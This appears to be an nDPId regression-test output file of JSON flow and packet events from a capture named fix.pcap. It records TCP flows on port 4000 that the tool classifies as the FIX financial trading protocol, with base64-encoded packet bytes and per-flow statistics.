00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7440000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"}
00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"}
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"}
00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="}
00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"thread_ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"}
00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
